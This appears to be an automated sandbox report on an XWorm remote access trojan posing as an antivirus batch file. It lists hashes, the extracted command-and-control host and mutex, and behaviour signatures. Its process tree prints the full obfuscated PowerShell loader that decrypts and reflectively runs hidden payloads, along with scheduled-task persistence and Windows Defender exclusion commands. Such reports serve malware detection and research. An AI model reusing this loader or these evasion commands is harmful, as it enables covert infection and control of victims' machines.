xworm | fbc3a0a0fa908b5261b13f0cc740cca0d6cf7e298cdd1a0413b0e16944bc949f

Analysis

max time kernel
149s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-01-2025 17:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IntegoAntiVirus.bat
Size

265KB
MD5

ea022218cf52320994c98e2f1b0e9f46
SHA1

b17198bf147cd1905d909faf1cc08dee5402884f
SHA256

fbc3a0a0fa908b5261b13f0cc740cca0d6cf7e298cdd1a0413b0e16944bc949f
SHA512

576a8e622e224f58f5ff790c0fe21c2d4fe7a61614c81e9d6bac0c9ac0faae5674204232f1527e7aade3d9f37dde28627a43da0fd1291b42c9744db76d1f98f3
SSDEEP

3072:JwE9dw4ei9DhjnnvKTcyvLzbwU9PVCuEcl+OAsssr00B/bIY6rFaYSs1Kn/cPTCq:+CdNeUrWD3tLHpguxB/IFLDrGuc0w4Cc

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Mutex

FNNdfYyntLqI4SWH

Attributes

Install_directory
%ProgramData%

aes.plain

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/4416-112-0x000002845DA60000-0x000002845DA6C000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4416-43-0x000002845CFE0000-0x000002845CFF0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 64 IoCs

flow	pid	Process
2	4416	powershell.exe
4	4416	powershell.exe
5	4416	powershell.exe
6	4416	powershell.exe
7	4416	powershell.exe
8	4416	powershell.exe
9	4416	powershell.exe
10	4416	powershell.exe
11	4416	powershell.exe
12	4416	powershell.exe
13	4416	powershell.exe
14	4416	powershell.exe
15	4416	powershell.exe
16	4416	powershell.exe
17	4416	powershell.exe
18	4416	powershell.exe
19	4416	powershell.exe
20	4416	powershell.exe
21	4416	powershell.exe
22	4416	powershell.exe
23	4416	powershell.exe
24	4416	powershell.exe
25	4416	powershell.exe
26	4416	powershell.exe
27	4416	powershell.exe
28	4416	powershell.exe
29	4416	powershell.exe
30	4416	powershell.exe
31	4416	powershell.exe
32	4416	powershell.exe
33	4416	powershell.exe
34	4416	powershell.exe
35	4416	powershell.exe
36	4416	powershell.exe
37	4416	powershell.exe
38	4416	powershell.exe
39	4416	powershell.exe
40	4416	powershell.exe
41	4416	powershell.exe
42	4416	powershell.exe
43	4416	powershell.exe
44	4416	powershell.exe
45	4416	powershell.exe
46	4416	powershell.exe
47	4416	powershell.exe
48	4416	powershell.exe
49	4416	powershell.exe
50	4416	powershell.exe
53	4416	powershell.exe
61	4416	powershell.exe
62	4416	powershell.exe
63	4416	powershell.exe
64	4416	powershell.exe
69	4416	powershell.exe
70	4416	powershell.exe
71	4416	powershell.exe
72	4416	powershell.exe
75	4416	powershell.exe
76	4416	powershell.exe
78	4416	powershell.exe
79	4416	powershell.exe
81	4416	powershell.exe
82	4416	powershell.exe
83	4416	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
232	powershell.exe
5032	powershell.exe
4416	powershell.exe
4812	powershell.exe
2084	powershell.exe
2692	powershell.exe

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	powershell.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Windows\CurrentVersion\Run\powershell = "C:\\ProgramData\\powershell.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe

Enumerates system info in registry 2 TTPs 13 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
232	powershell.exe
232	powershell.exe
5032	powershell.exe
5032	powershell.exe
4416	powershell.exe
4416	powershell.exe
4812	powershell.exe
4812	powershell.exe
2084	powershell.exe
2084	powershell.exe
2692	powershell.exe
2692	powershell.exe
3616	msedge.exe
3616	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3180	msedge.exe
3180	msedge.exe
4192	msedge.exe
4192	msedge.exe
872	msedge.exe
872	msedge.exe
2764	msedge.exe
2764	msedge.exe
3572	identity_helper.exe
3572	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3640	msedge.exe
3640	msedge.exe
4192	msedge.exe
4192	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeIncreaseQuotaPrivilege	5032	powershell.exe
Token: SeSecurityPrivilege	5032	powershell.exe
Token: SeTakeOwnershipPrivilege	5032	powershell.exe
Token: SeLoadDriverPrivilege	5032	powershell.exe
Token: SeSystemProfilePrivilege	5032	powershell.exe
Token: SeSystemtimePrivilege	5032	powershell.exe
Token: SeProfSingleProcessPrivilege	5032	powershell.exe
Token: SeIncBasePriorityPrivilege	5032	powershell.exe
Token: SeCreatePagefilePrivilege	5032	powershell.exe
Token: SeBackupPrivilege	5032	powershell.exe
Token: SeRestorePrivilege	5032	powershell.exe
Token: SeShutdownPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeSystemEnvironmentPrivilege	5032	powershell.exe
Token: SeRemoteShutdownPrivilege	5032	powershell.exe
Token: SeUndockPrivilege	5032	powershell.exe
Token: SeManageVolumePrivilege	5032	powershell.exe
Token: 33	5032	powershell.exe
Token: 34	5032	powershell.exe
Token: 35	5032	powershell.exe
Token: 36	5032	powershell.exe
Token: SeIncreaseQuotaPrivilege	5032	powershell.exe
Token: SeSecurityPrivilege	5032	powershell.exe
Token: SeTakeOwnershipPrivilege	5032	powershell.exe
Token: SeLoadDriverPrivilege	5032	powershell.exe
Token: SeSystemProfilePrivilege	5032	powershell.exe
Token: SeSystemtimePrivilege	5032	powershell.exe
Token: SeProfSingleProcessPrivilege	5032	powershell.exe
Token: SeIncBasePriorityPrivilege	5032	powershell.exe
Token: SeCreatePagefilePrivilege	5032	powershell.exe
Token: SeBackupPrivilege	5032	powershell.exe
Token: SeRestorePrivilege	5032	powershell.exe
Token: SeShutdownPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeSystemEnvironmentPrivilege	5032	powershell.exe
Token: SeRemoteShutdownPrivilege	5032	powershell.exe
Token: SeUndockPrivilege	5032	powershell.exe
Token: SeManageVolumePrivilege	5032	powershell.exe
Token: 33	5032	powershell.exe
Token: 34	5032	powershell.exe
Token: 35	5032	powershell.exe
Token: 36	5032	powershell.exe
Token: SeIncreaseQuotaPrivilege	5032	powershell.exe
Token: SeSecurityPrivilege	5032	powershell.exe
Token: SeTakeOwnershipPrivilege	5032	powershell.exe
Token: SeLoadDriverPrivilege	5032	powershell.exe
Token: SeSystemProfilePrivilege	5032	powershell.exe
Token: SeSystemtimePrivilege	5032	powershell.exe
Token: SeProfSingleProcessPrivilege	5032	powershell.exe
Token: SeIncBasePriorityPrivilege	5032	powershell.exe
Token: SeCreatePagefilePrivilege	5032	powershell.exe
Token: SeBackupPrivilege	5032	powershell.exe
Token: SeRestorePrivilege	5032	powershell.exe
Token: SeShutdownPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeSystemEnvironmentPrivilege	5032	powershell.exe
Token: SeRemoteShutdownPrivilege	5032	powershell.exe
Token: SeUndockPrivilege	5032	powershell.exe
Token: SeManageVolumePrivilege	5032	powershell.exe
Token: 33	5032	powershell.exe
Token: 34	5032	powershell.exe
Token: 35	5032	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe

Suspicious use of SendNotifyMessage 42 IoCs

pid	Process
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
3640	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
4192	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe
2764	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 3380	2480	cmd.exe	79
PID 2480 wrote to memory of 3380	2480	cmd.exe	79
PID 3380 wrote to memory of 1632	3380	net.exe	80
PID 3380 wrote to memory of 1632	3380	net.exe	80
PID 2480 wrote to memory of 232	2480	cmd.exe	81
PID 2480 wrote to memory of 232	2480	cmd.exe	81
PID 232 wrote to memory of 5032	232	powershell.exe	82
PID 232 wrote to memory of 5032	232	powershell.exe	82
PID 232 wrote to memory of 3500	232	powershell.exe	85
PID 232 wrote to memory of 3500	232	powershell.exe	85
PID 3500 wrote to memory of 2536	3500	WScript.exe	86
PID 3500 wrote to memory of 2536	3500	WScript.exe	86
PID 2536 wrote to memory of 5040	2536	cmd.exe	88
PID 2536 wrote to memory of 5040	2536	cmd.exe	88
PID 5040 wrote to memory of 1188	5040	net.exe	89
PID 5040 wrote to memory of 1188	5040	net.exe	89
PID 2536 wrote to memory of 4416	2536	cmd.exe	90
PID 2536 wrote to memory of 4416	2536	cmd.exe	90
PID 4416 wrote to memory of 4812	4416	powershell.exe	91
PID 4416 wrote to memory of 4812	4416	powershell.exe	91
PID 4416 wrote to memory of 2084	4416	powershell.exe	93
PID 4416 wrote to memory of 2084	4416	powershell.exe	93
PID 4416 wrote to memory of 2692	4416	powershell.exe	95
PID 4416 wrote to memory of 2692	4416	powershell.exe	95
PID 4416 wrote to memory of 1776	4416	powershell.exe	97
PID 4416 wrote to memory of 1776	4416	powershell.exe	97
PID 4416 wrote to memory of 2752	4416	powershell.exe	98
PID 4416 wrote to memory of 2752	4416	powershell.exe	98
PID 2752 wrote to memory of 3540	2752	vbc.exe	100
PID 2752 wrote to memory of 3540	2752	vbc.exe	100
PID 1776 wrote to memory of 1716	1776	vbc.exe	99
PID 1776 wrote to memory of 1716	1776	vbc.exe	99
PID 3640 wrote to memory of 1916	3640	msedge.exe	116
PID 3640 wrote to memory of 1916	3640	msedge.exe	116
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117
PID 3640 wrote to memory of 3776	3640	msedge.exe	117

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\IntegoAntiVirus.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8eCbx7A9E5l+8QBOoBT74LYBwVwy7nf1Fd0OmStfIM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X5JxwnR5i5/LrhPpBtNEmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CprDD=New-Object System.IO.MemoryStream(,$param_var); $Dbdql=New-Object System.IO.MemoryStream; $GvqMd=New-Object System.IO.Compression.GZipStream($CprDD, [IO.Compression.CompressionMode]::Decompress); $GvqMd.CopyTo($Dbdql); $GvqMd.Dispose(); $CprDD.Dispose(); $Dbdql.Dispose(); $Dbdql.ToArray();}function execute_function($param_var,$param2_var){ $mnjHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HMnbt=$mnjHM.EntryPoint; $HMnbt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IntegoAntiVirus.bat';$uFrlu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IntegoAntiVirus.bat').Split([Environment]::NewLine);foreach ($hWmNO in $uFrlu) { if ($hWmNO.StartsWith(':: ')) { $qtnCQ=$hWmNO.Substring(3); break; }}$payloads_var=[string[]]$qtnCQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_331_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_331.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_331.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_331.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2536
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5040
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:1188
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8eCbx7A9E5l+8QBOoBT74LYBwVwy7nf1Fd0OmStfIM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X5JxwnR5i5/LrhPpBtNEmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CprDD=New-Object System.IO.MemoryStream(,$param_var); $Dbdql=New-Object System.IO.MemoryStream; $GvqMd=New-Object System.IO.Compression.GZipStream($CprDD, [IO.Compression.CompressionMode]::Decompress); $GvqMd.CopyTo($Dbdql); $GvqMd.Dispose(); $CprDD.Dispose(); $Dbdql.Dispose(); $Dbdql.ToArray();}function execute_function($param_var,$param2_var){ $mnjHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HMnbt=$mnjHM.EntryPoint; $HMnbt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_331.bat';$uFrlu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_331.bat').Split([Environment]::NewLine);foreach ($hWmNO in $uFrlu) { if ($hWmNO.StartsWith(':: ')) { $qtnCQ=$hWmNO.Substring(3); break; }}$payloads_var=[string[]]$qtnCQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Disables RegEdit via registry modification
        Adds Run key to start application
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4812
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4hwgxduy\4hwgxduy.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1776
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AA5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB502BC7CBD1744E38AD991F0EE7B7C3A.TMP"
        7⤵
        
        PID:1716
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\unmk4e2g\unmk4e2g.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2752
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AA6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB987E5216FBA4368A727CAD4888CE14C.TMP"
        7⤵
        
        PID:3540

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:2288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://terminak/
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff79623cb8,0x7fff79623cc8,0x7fff79623cd8
  2⤵
  PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4048165679407303260,14421585043456759490,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:3776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,4048165679407303260,14421585043456759490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3616
